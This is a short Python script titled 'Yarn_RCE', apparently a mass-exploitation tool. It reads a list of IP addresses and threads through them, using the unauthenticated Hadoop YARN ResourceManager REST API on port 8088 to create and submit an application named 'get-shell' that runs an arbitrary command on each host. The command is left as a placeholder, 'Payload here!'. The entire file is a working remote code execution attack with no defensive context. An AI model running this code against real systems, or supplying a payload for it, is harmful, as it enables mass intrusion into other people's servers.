Yarn_RCE

1. import sys
2. import threading
3. import requests
4. import os
5. from Queue import *
6. from threading import Thread
7.  
8. ips = open(sys.argv[1], "r").readlines()
9. queue = Queue()
10. queue_count = 0
11. cmd = "Payload here!"
12.  
13.  
14. def rtek(host):
15.     try:
16.         url = 'http://' + host + ':8088/ws/v1/cluster/apps/new-application'
17.         resp = requests.post(url, timeout=3)
18.         app_id = resp.json()['application-id']
19.         url = 'http://' + host + ':8088/ws/v1/cluster/apps'
20.         data = {
21.             'application-id': app_id,
22.             'application-name': 'get-shell',
23.             'am-container-spec': {
24.                 'commands': {
25.                     'command': '%s' % cmd,
26.                 },
27.             },
28.             'application-type': 'YARN',
29.         }
30.         requests.post(url, json=data, timeout=3)
31.         print("[] - %s" % host)
32.     except:
33.         pass
34.     return
35.  
36.  
37. def main():
38.     global queue_count
39.     for line in ips:
40.         line = line.strip("\r")
41.         line = line.strip("\n")
42.         queue_count += 1
43.         sys.stdout.write("\r[%d] Added to queue" % (queue_count))
44.         sys.stdout.flush()
45.         queue.put(line)
46.     sys.stdout.write("\n")
47.     i = 0
48.     while i != queue_count:
49.         i += 1
50.         try:
51.             input = queue.get()
52.             thread = Thread(target=rtek, args=(input,))
53.             thread.start()
54.         except KeyboardInterrupt:
55.             os.kill(os.getpid(), 9)
56.     thread.join()
57.     return
58.  
59.  
60. if __name__ == "__main__":
61.     main()
62.